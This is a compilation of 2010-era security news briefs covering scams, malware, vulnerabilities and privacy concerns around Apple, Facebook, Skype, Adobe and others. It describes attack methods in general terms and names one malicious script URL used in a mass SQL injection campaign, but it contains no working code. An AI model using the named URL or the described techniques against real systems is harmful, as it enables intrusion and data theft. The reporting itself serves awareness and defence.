What's Apple Doing With Geolocation Data?

Congressmen ask for explanation about alterations in the company's privacy policy.

Reps. Edward J. Markey and Joe Barton, co-chairmen of the House Bi-Partisan Privacy Caucus, have asked Apple for an explanation of recent changes in the company's privacy policy.

The congressmen are concerned over media reports that the changes suggest that Apple is collecting and sharing data containing the geographic locations of iPhone and iPad users.

"Given the limited ability of Apple users to opt out of the revised policy and still be able to take advantage of the features of their Apple products, we are concerned about the impact the collection of such data could have on the privacy of Apple's customers," the lawmakers wrote in a letter sent Thursday to Apple chief executive Steve Jobs.

Markey, D-Mass., and Barton, R-Texas, have asked Apple to respond by July 12. Apple did not return a request for comment in time for this writing.

The changes to Apple's general privacy policy was first reported Monday by the Los Angeles Times. The paragraph added would allow Apple and unspecified "partners and licensees" to collect and store user location data, the newspaper said. Users of Apple products would have to agree to the policy first.

Apple has been collecting location data since 2008. The difference now is that Apple has moved the notification of the practice from End User License Agreements of individual products to its general privacy policy covering all product, the Los Angeles Times reported.

The added passage reads:

"To provide location-based services on Apple products, Apple and our partners and licensees may collect, use, and share precise location data, including the real-time geographic location of your Apple computer or device. This location data is collected anonymously in a form that does not personally identify you and is used by Apple and our partners and licensees to provide and improve location-based products and services."

While the data is collected anonymously, analysts have shown that such data can be used to identify people based on behavior patterns. However, without the gathering of location data, applications dependent on the information, such as mapping software, wouldn't be very useful. How to balance the need for such information and people's privacy remains an open question.

Nevertheless, the number of smartphones with location-based services is growing dramatically. The number of smartphones with navigation systems supporting such services will rise from 81 million units this year to 297 million by 2014, according to iSuppli.

FIFA World Cup Soccer - Malware based attacks continue

Symantec and Message Labs continue to warn of malicious email, scams and websites, using the 2010 Soccer World cup theme. Some of these continuing attacks are arriving in my own email, so please be careful:

FIFA World Cup Soccer - Malware based attacks continue
http://www.symantec.com/connect/blogs/fifa-world-cup-scams-continue-circulate

QUOTE: As reported in the June MessageLabs Intelligence Report, MessageLabs Intelligence is seeing a great variety of different threats relating to the upcoming FIFA World Cup. We’ve seen 419-style scams, including emails offering tickets to games; fake accommodation providers; offers of contracts to supply clothing and boots; offers of free mobile phones; scams looking for companies to provide additional electricity/power for the World Cup; and more. All designed to ultimately obtain the recipient’s personal details, and/or money by means of deception and fraud.

MessageLabs Intelligence has also seen fake World Cup tickets for sale on well known auction websites, or advertisements offering tickets, that in reality are unlikely to give the buyer access to any games. Moreover, we’ve seen a huge volume of spam that contains World Cup related content, but is actually not about the World Cup.

Security Holes Fixed By IOS 4

Apple has released the newest version of the iPhone/iPod/iPad software, collectively known as iOS. Formerly known as iPhone OS, the new name is not the only change to be had with this update.

On Apple's website, there is a list of 64 security risks which have been fixed in this new version. The area of the operating system which was apparently the most vulnerable to security breaches is WebKit. WebKit is the browser engine which powers mobile safari on iDevices, and was the cause for 50 of the security patches. That's three quarters of the errors fixed. Of the security holes in WebKit, over half of them would allow "arbitrary code execution" which is a nice way of saying run a program on your device which could either harm your device or access your personal information, just by pointing your mobile browser at the wrong website.

There were 14 non-WebKit related security updates. Safari itself receives the blame for a few of these. There were problems with cookies being accepted when they should have been disabled. There were also issues with URLs during redirects between http and https sites. Furthermore, there were vulnerabilities when viewing "maliciously crafted" BMP, TIFF, and JPEG images. These images could cause data from Safari's memory to be sent to the web server or for more "arbitrary code execution" on the device.

Another severe security vulnerability relates to the passcode lock on iDevices. The first issue is with the Remote Lock via MobileMe. In this instance, the device must be unlocked due to receiving a text message or voicemail, then locked with Remote Lock. The next time the device is unlocked, the passcode will be displayed, thereby granting access to anyone who is in physical possession of said device. The other vulnerability comes in the form of pairing devices with a new computer. As it stands, this can only be done while unlocked. There is a chance for a race condition when the device is initially booted, if it was unlocked when shut down. This can allow the device to be paired with a new computer without unlocking the device first.

All of these issues have been fixed with the release of iOS 4. Now the only question is whether or not there will be more opportunities for these security holes to be exploited before the iPad version is released this fall, especially now that they have been published.

HTML files redirect users to malicious sites, evade mail server antivirus

Facebook, Twitter and Skype are Internet behemoths, counting hundreds of millions users each, so it is not surprising that many malicious email campaigns masquerade as legitimate notices coming from these three sources.

The number of emails that try to trick recipients into downloading malicious files has surged in the last few days. Users are notified that their Twitter or Facebook password has been reset, that they should check details of purchases effected through Skype, that they have messages waiting for them, etc.

What these emails have in common is that they contain a .html file, which changes name from email to email, but always contains a a script that redirects the users to a website rife with malicious code that tries to exploit vulnerabilities in Adobe, IE and Java and through them download malware on the users' computer.

A Bkis security researcher thinks we are witnessing the birth of a new trend. According to him, attackers will be switching to this kind malicious files for two reasons:

• A lot of people have learned by now that .exe and .zip files in attachments are probably bad news and they delete the email, but .html files have managed to avoid looking instantly suspicious.
• These .html attachments don't contain any kind of malicious or exploit code, which makes them perfect for bypassing antivirus programs integrated in mail servers or antivirus solutions in general:

When you think about it, the file in question does the exact same thing a malicious link would do, but - once again - many users have learned not to click on those either.

Cracked Wi-Fi Standards (Finally) Being Phased Out

Standards groups say WEP, TKIP will no longer be allowed in interoperability tests.

For years, security managers have been frustrated by the continued use of outdated Wi-Fi encryption standards that have been proved to be insecure. Now it appears that standards groups are going to do something about it.

According to a news report by H-Online, the Wi-Fi Alliance -- which tests the interoperability of IEEE wireless LAN products -- has scheduled a phaseout of products that use WEP and TKIP, two encryption standards that have been repeatedly broken by security researchers.

"As early as January of 2011, the WFA plans to disallow TKIP for new access points (APs); from 2012, the obsolete standard is to be disallowed in all Wi-Fi devices," the report states. "For WEP, the bell will toll a little later: From 2013, APs will no longer be allowed to offer WEP, and a year later the standard will be disallowed in all Wi-Fi devices."

In addition, the WPA2-Mixed mode, in which access points are allowed to offer TKIP for secondary encryption, will be removed in 2014, the report says. Only WPA2-AES will be permissible from then on.

Many users believe they can keep their Wi-Fi transmissions safe by using WEP or TKIP -- and because the technologies are often shipped in new products, they have no reason to believe otherwise. Even at the RSA conference earlier this year -- a conference attended primarily by security professionals -- more than 60 percent of Wi-Fi nodes were still using WEP or TKIP.

Months-old Skype vulnerability exploited in the wild

A Skype flaw patched some 9 months ago with the new version (4.1.0.179) of the VoIP client has been spotted being exploited in the wild.

According to M86 Security Labs, the vulnerability has been discovered in the EasyBits Extras Manager, a plug-in component for Skype, and for all those people who haven't updated their client, this presents a gaping hole in their security perimeter.

With the above code, the attackers are able to exploit the vulnerability to download malware on the user's system and bypass the great majority of antivirus solutions.

Bradley Anstis, VP of Technology for M86 Security says that there is no evidence that the campaign is a massive one, but it definitely points out the fact that updating software is of crucial importance.

Dancho Danchev points out that Skype is well known for having a glitch that prevents users to update the client using the "Check for updates" feature. If they want to use the new version, they are forced to download it and install it - making the updating process inconvenient and the users stick with the old version.

114,000 IPad 3G Owners' Email Addresses Exposed By AT&T

A group called Goatse Security was able to grab 114,067 personal email addresses of iPad buyers from AT&T's website.

Some of the Email addreses leaked include White House Chief of Staff Rahm Emanuel, New York City Mayer Michael Bloomberg, Diane Sawyer of ABC News, and many CEOs, CFO, and CTO's. A number of the email addresses exposed were even those of DARPA reesarchers and high-ranking military officials.

Each iPad comes with an ICC-ID or an "integrated circuit card identifier." The subscriber's SIM card and ICC-ID are linked to uniquely identify them. Normally this data would not be publicly accessible.

AT&T goofed big time and left a script on their website that allowed anyone to query it. If an ICC-ID was provided to the script, it responded with a the subscriber's email address. This script was intended to be used with AJAX apps, but obviously had no protections built in.

This lack of security allowed researchers to write a simple PHP script that used the iPad browser agent string to grab potentially millions of addresses. This would not have been possible with out all the pictures of iPad's online that helped them to guess the ICC-IDs. Like any exploit group that wants fame, these guys shared the script and corresponding info with many others like them before reporting the gaping security hole to AT&T.

So now Steve Jobs has a bit of a problem. Hundreds of thousands of customer's and potentially millions of email address have been made available to groups that could use them for malicious purposes. Not only that, but the iPad 3G looks rather unappealing now even if it was not Apple that was responsible for the breach.

If you bought an iPad 3G and have an email address that doesn't reveal your identity and a strong password for it, you might be safe. However, now is as good a time as any to change your email password to something stronger. Also, if your email is firstname.lastname@mysite.com or something similar, just be very cautious about who you open PDF's from and the links you click in emails. Its easier than you might think for criminals to target a victim with a specially crafted convincing email that appears to be from co-workers or friends.

References: http://security.goatse.fr/

Mass SQL injection attack compromises IIS/ASP sites

Thousands of websites and who knows how many visitors were affected by the recently discovered mass SQL injection attack that targeted - among others - The Wall Street Journal and The Jerusalem Post websites.

Sucuri Security spotted the attack on many websites and Googled the http://ww.robint.us/u.js web address to which the script was pointing, and according to the results, some 114.000 different pages contained it.

Further investigation into the matter revealed the common denominator: all sites are hosted on IIS servers and use ASP.net. By sifting through the logs and the packet dump of the attack, they also discovered that the attack was launched against a third party ad management script.

When a user visits a compromised site, the malicious code will attempt to redirect him to a site where malware is waiting to be installed on his machine and allow the criminals behind this attack remote access to it.

Mary Landesman, security researcher with Cisco, claims that only around 7,000 pages are infected (she searched the entire script through Google, not just the web address it points to). She also points out that when it comes to larger websites, only certain pages on the websites are infected, which - she admits - might not mean much to affected users.

Beware when placing online bets during the World Cup

With the World Cup approaching, online players all over the world are preparing to place their bets on the different soccer games. Taking security issues into account and looking at the recent trends for online betting, most of the bets will be made through betting websites.

This occasion presents plenty of opportunities for hacking, phishing or man-in-the-middle attacks, when going online to place their bet.

To safeguard online players VASCO has outlined some guidelines to take into account when betting online during the World Cup period. Some simple rules can already help betters prevent from credit card details, digital assets or personal data getting exposed online. Cautious behavior includes:

• Make sure the betting website is trustworthy and the operator is licensed
• Check if the website has a privacy policy to make sure your personal data are safe
• The website should be secured using SSL
• Know what you are betting for; know what it will cost you
• Choose a provider that uses two factor authentication which offers enhanced security for players placing bets.

Fake Facebook account deactivation email

Sunbelt reports that in a spam run that may at first glance appear to be a phishing attempt aimed at getting your login credentials, mailboxes around the world have been filled with an email supposedly coming from "The Facebook Team":

Since the latest changes of Facebook's security settings have caused quite a stir, and many people did deactivate their accounts, it is obvious that these spammers count on people who haven't to be worried that their account has been mistakenly deactivated.

Luckily for them, a click on the "Sing In" link in the email does not take them to a phishing site, but to a Canadian Pharmacy site that tries to peddle their wares. Annoying? Yes - but less harmful than phishing.

Still, users should be careful when clicking on links in emails and avoid those in unsolicited emails.

Rootkits on Android smartphones

As our mobile phones get "smarter" and our personal and professional lives get increasingly mobile, the possibility of these devices getting compromised and the negative effects of such an occurrence are starting to worry a lot of people.

Nicholas Percoco and Christian Papathanasiou, two security researchers from Trustwave, have taken it upon themselves to investigate the possibility of creating a rootkit for Android smartphones that would allow an attacker to gain access to the device and the data inside it.

They have recently announced that they came up with a proof-of-concept kernel-level rootkit in the form of a loadable kernel module, with the help of which they will demonstrate an attack on a Android smartphone at the DefCon conference next month.

The rootkit "is able to send an attacker a reverse TCP over 3G/WIFI shell upon receiving an incoming call from a 'trigger number'. This ultimately results in full root access on the Android device," they say. "The implications of this are huge; an attacker can proceed to read all SMS messages on the device/incur the owner with long-distance costs, even potentially pin-point the mobile device's exact GPS location. Such a rootkit could be delivered over-the-air or installed alongside a rogue app."

So Android users, keep a lookout!

Critical Adobe Flash, Reader 0-day flaw exploited in the wild

A zero-day flaw affecting 10.0.x and 9.0.x versions of Adobe Flash Player - including the current version, which is 10.0.45.2 - has been spotted being exploited in the wild. The flaw also affects Adobe Reader and Acrobat 9.3.2 and earlier 9.x, since the vulnerable authplay.dll component ships with those products.

Adobe released on Friday the security advisory detailing the particulars of the critical vulnerability, saying that it "could cause a crash and potentially allow an attacker to take control of the affected system," and that "there are reports that this vulnerability is being actively exploited in the wild against both Adobe Flash Player, and Adobe Reader and Acrobat."

While waiting for the fix to be pushed out, Adobe advises users to switch to Flash Player 10.1 Release Candidate, which does not appear to be vulnerable, or "deleting, renaming, or removing access to the authplay.dll file that ships with Adobe Reader and Acrobat 9.x." This action mitigates the threat, but users will be unable to open PDF files with Flash content because the program will crash or they will witness an error message.

Top 5 FIFA World Cup online risks

Lavasoft warned computer users to be aware of stealthy online traps set by cybercriminals to leverage public interest surrounding the 2010 FIFA World Cup – and issued advice to follow to make sure people enjoy the month-long tournament without becoming the target or victim of an attack.

The World Cup, which begins in only one week and lasts throughout mid July, is known to be the most widely-viewed sporting event in the world. Events that draw such pervasive and ongoing public interest will, without a doubt, be used to propagate socially-engineered crimes - where users are manipulated into performing certain actions or disclosing confidential information.

Lavasoft analysts anticipate that the following five online security risks will be most prevalent leading up to and during the World Cup – and offers specific steps to take to avoid becoming a victim.

Read on for the tips to avoid the online risks.

Samsung smartphone shipped with malware-infected memory card

The latest mass-market product that has been found being shipped to customers while containing malware is the Samsung S8500 Wave phone with the Samsung bada mobile platform.

The malicious file in question is slmvsrv.exe, and can be found on the 1GB microSD memory card contained in the smartphone. The malicious file is accompanied by an Autorun.inf file, which installs itself on any Windows PC that still has the autorun feature enabled.

According to Michael Oryl, he received a device for testing and after he found out that the card was infected, he did an online search for the file in question and unearthed two posts on some German forums that claim the same. He contacted Samsung, and they confirmed that the initial production run of the devices shipped to Germany was, indeed, infected.

"A PC that is infected with the malware will try to copy the program and associated autorun.inf file onto any memory card or USB memory drive that is inserted into the infected computer. The copied files will show the then-current date and time, which indicates that our memory card was infected in the first half of May, before the phone was shipped overseas to us," says Oryl.

Popular websites distribute spyware-infected Mac software

Intego has discovered a spyware application that is installed by a number of freely distributed Mac applications and screen savers found on a variety of websites.

This spyware, OSX/OpinionSpy, performs a number of malicious actions, from scanning files to recording user activity, as well as sending information about this activity to remote servers and opening a backdoor on infected Macs.

OSX/OpinionSpy is installed by a number of applications and screen savers that are distributed on sites such as MacUpdate, VersionTracker and Softpedia. The spyware itself is not contained in these applications, but is downloaded during the installation process. This shows the need for an up-to-date anti-malware program with a real-time scanner that can detect this malware when it is downloaded by the original application’s installer.

The information provided with some of these applications contains a misleading text that users must accept explaining that a “market research” program is installed with them, but not all of these specify this. Some of these programs are also distributed directly from developers’ web sites with no such warning.

The malware, a version of which has existed for Windows since 2008, claims to collect browsing and purchasing information that is used in market reports. However, this program goes much further, performing a number of insidious actions, which have led Intego to classify it as spyware.

Detailed analysis of the spyware here.

As seen in the detailed report, this application that purports to collect information for marketing reasons does much more, going as far as scanning all the files on an infected Mac. Users have no way of knowing exactly what data is collected and sent to remote servers; such data may include user names, passwords, credit card numbers and more. The risk of this data being collected and used without users’ permission makes this spyware particularly dangerous to users’ privacy.

The fact that this application collects data in this manner, and that it opens a backdoor, makes it a very serious security threat. In addition, the risk of it collecting sensitive data such as user names, passwords and credit card numbers, makes this a very high-risk spyware. While its distribution is limited, we warn Mac users to pay careful attention to which software they download and install.

Critical vulnerabilities in Photoshop CS4

Critical vulnerabilities have been identified in Photoshop CS4 11.01 and earlier for Windows and Macintosh that could allow an attacker who successfully exploits these vulnerabilities to take control of the affected system.

A malicious .ASL, .ABR, or .GRD file must be opened in Photoshop CS4 by the user for an attacker to be able to exploit these vulnerabilities.

Adobe recommends Photoshop CS4 customers update to Photoshop CS4 11.0.2, which resolves these issues. Adobe also encourages all customers to follow security best practices by exercising caution before opening any unknown file or files from unknown sources, regardless of the application used to open the file.

These issues do not affect Photoshop CS5.

To verify the version of Adobe Photoshop CS4 currently installed, choose Help > About Adobe Photoshop CS4 from the Adobe Photoshop menu bar. To check for updates, choose Help > Updates from the Adobe Photoshop menu bar.

Photoshop CS4 customers can find the Photoshop CS4 11.0.2 update for Windows or Macintosh here:

• Adobe Photoshop CS4 11.0.2 update for Windows
• Adobe Photoshop CS4 11.0.2 update for Macintosh.

Critical iPhone security issue leaves your contents exposed

Most iPhone users are confident that using a passcode to secure their devices means that even if they lost them or they get stolen, their data will be protected from prying eyes.

Unfortunately for them, Bernd Marienfeld, an information security professional, has discovered last week that the passcode protection can be bypassed by simply connecting the iPhone 3GS in question to a computer running Ubuntu 10.04.

According to him, the iPhone can be tricked into allowing access to photos, videos, music, voice recordings, Google safe browsing database, game contents, and more, by switching it off and connecting it to the computer, then switching the iPhone back on:

He claims that he has managed to get read-and-write access in 4 different 3GS, non jailbroken, passcode protected iPhones with different iPhone OS version installed. He says the vulnerability is definitely not an Ubuntu vulnerability, but a flaw in the iPhone's way of implementing authentication when connected to a computer.

Apple has been notified of the flaw, and they managed to reproduce it, but have yet to push out a fix or to say when it will be made available.

In the meantime, heise Security has succeed in using the same flaw to gain full system access to an iPhone - even to create a backup of the content - by using iTunes on Windows. According to Marienfeld, they could read notes, SMS messages and passwords in plaintext.

Since the iPhone has become the device of choice for many an enterprise user, Apple will definitely have to take a good look into the security settings and features of one of its most popular products if it wants to keep its market share - or increase it.

Viral clickjacking Facebook worm spreads

Yet another clickjacking attack has recently been aimed at Facebook users.

If you see messages such as "LOL This girl gets OWNED after a POLICE OFFICER reads her STATUS MESSAGE.", "This man takes a picture of himself EVERYDAY for 8 YEARS!!", "The Prom Dress That Got This Girl Suspended From School.", and "This Girl Has An Interesting Way Of Eating A Banana, Check It Out!" on a friend's Facebook page, you can be pretty sure they have clicked on the same message that came up on their friend's page.

Clicking on any of those links sends the user to a web page that sports - black on white - only one line of text: "Click here to continue".

A curious friend clicks on the link, and the clickjacking worm starts a new cycle.

Graham Cluley recommends to users that have fallen for the scheme to review their news feed and delete the offending messages, then removing the page(s) from their "Likes and interests" section.

A click on any spot of the page (text or not) makes the message be published on your Facebook page. The culprit is a hidden iFrame, which actually makes you "like" a page by the same name as the message: